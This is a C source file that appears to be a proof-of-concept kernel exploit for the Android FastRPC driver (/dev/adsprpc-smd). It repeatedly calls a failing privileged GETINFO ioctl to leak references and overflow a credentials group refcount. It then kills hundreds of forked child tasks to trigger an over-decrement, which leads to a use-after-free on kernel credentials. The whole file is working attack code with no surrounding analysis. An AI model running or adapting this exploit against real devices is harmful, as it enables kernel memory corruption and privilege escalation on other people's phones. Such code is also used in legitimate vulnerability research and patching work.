#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <string.h>
#include <stdio.h>
#include <stdbool.h>
#include <fcntl.h>
#include <stdint.h>
#include <errno.h>
#include <sched.h>
#include <unistd.h>
#include <time.h>
#include <signal.h>
#include <sys/prctl.h>
#include <sys/ioctl.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

// tell the scheduler to pin a task to a specific CPU core
static void pin_task_to(int pid, int cpu) {
  cpu_set_t cset;
  CPU_ZERO(&cset);
  CPU_SET(cpu, &cset);
  SYSCHK(sched_setaffinity(pid, sizeof(cpu_set_t), &cset));
}
static void pin_to(int cpu) { pin_task_to(0, cpu); }

#define FASTRPC_IOCTL_GETINFO	_IOWR('R', 8, uint32_t)

static uint64_t num_increments_global = 0;
static uint64_t num_increments_local[8];
static time_t t_start;

#define NUM_SPAM_CRED_TASKS 512
#define TARGET_NUM_INCREMENTS (0x100000000 - NUM_SPAM_CRED_TASKS)

#define CPU_MIN 6
#define CPU_MAX 7

static void *thread_fn(void *dummy) {
  int cpu = (int)(unsigned long)dummy;
  pin_to(cpu);

  SYSCHK(unshare(CLONE_FILES));
  while (1) {
    // bump groups refcount by 1 and leak the reference
    int fd = SYSCHK(open("/dev/adsprpc-smd", O_RDONLY));
    uint32_t info = 0; // privileged, we don't have access to 0, this fails
    if (ioctl(fd, FASTRPC_IOCTL_GETINFO, &info) != -1)
      errx(1, "expected GETINFO to fail");
    if (errno != EACCES)
      err(1, "expected EACCES from GETINFO");
    SYSCHK(close(fd));

    num_increments_local[cpu]++;
    uint64_t num_increments = __atomic_add_fetch(&num_increments_global, 1, __ATOMIC_RELAXED);
    if ((num_increments & 0xffff) == 0) {
      time_t t_now = time(NULL);
      double eta_hours = (double)(t_now - t_start) / num_increments * (TARGET_NUM_INCREMENTS-num_increments) / (60 * 60);

      FILE *bat_file = popen("cmd battery get level", "r");
      if (bat_file == NULL)
        errx(1, "popen");
      int bat_level;
      if (fscanf(bat_file, "%d", &bat_level) != 1)
        errx(1, "fscanf");
      pclose(bat_file);


      printf("\r0x%08lx increments in %lu seconds (ETA %f hours) [%lu,%lu,%lu,%lu,%lu,%lu,%lu,%lu] BAT=%d", num_increments, (unsigned long)(t_now - t_start), eta_hours,
          num_increments_local[0], num_increments_local[1], num_increments_local[2], num_increments_local[3],
          num_increments_local[4], num_increments_local[5], num_increments_local[6], num_increments_local[7],
          bat_level);

      if (bat_level < 40)
        sleep(600);
    }
    if (num_increments >= TARGET_NUM_INCREMENTS)
      break;
  }
  return NULL;
}

static void do_nothing_sighandler(int signum) {
  /* do nothing */
}

int main(int argc, char **argv) {
  setbuf(stdout, NULL);
  SYSCHK(signal(SIGCHLD, do_nothing_sighandler));
  SYSCHK(signal(35, SIG_IGN)); /* idk what the heck this is, something randomly signals me after hours of execution */

  if (argc != 2)
    errx(1, "invocation");
  if (strcmp(argv[1], "child") == 0) {
    while (1) pause();
  } else if (strcmp(argv[1], "main") != 0) {
    errx(1, "invocation");
  }

  pid_t spam_cred_tasks[NUM_SPAM_CRED_TASKS];
  for (int i=0; i<NUM_SPAM_CRED_TASKS; i++) {
    pid_t fork_res = SYSCHK(fork());
    if (fork_res == 0) {
      SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
      SYSCHK(execl("/proc/self/exe", "adsprpc-helper", "child", NULL));
    }
    spam_cred_tasks[i] = fork_res;
  }

  t_start = time(NULL);
  pthread_t threads[CPU_MAX+1];
  for (int i=CPU_MIN; i<=CPU_MAX; i++) {
    if (pthread_create(&threads[i], NULL, thread_fn, (void*)(unsigned long)i))
      errx(1, "pthread_create");
  }
  for (int i=CPU_MIN; i<=CPU_MAX; i++) {
    if (pthread_join(threads[i], NULL))
      errx(1, "pthread_join");
  }

  /* trigger refcount overdecrement */
  for (int i=0; i<NUM_SPAM_CRED_TASKS; i++)
    SYSCHK(kill(spam_cred_tasks[i], SIGKILL));

  /* in case we're still alive */
  while (1) {
    gid_t groups_list[1000];
    int num_groups = SYSCHK(getgroups(1000, groups_list));
    printf("groups at end:\n");
    for (int i=0; i<num_groups; i++)
      printf("%d ", (int)groups_list[i]);
    printf("\n");

    sleep(1);
  }
  return 0;
}
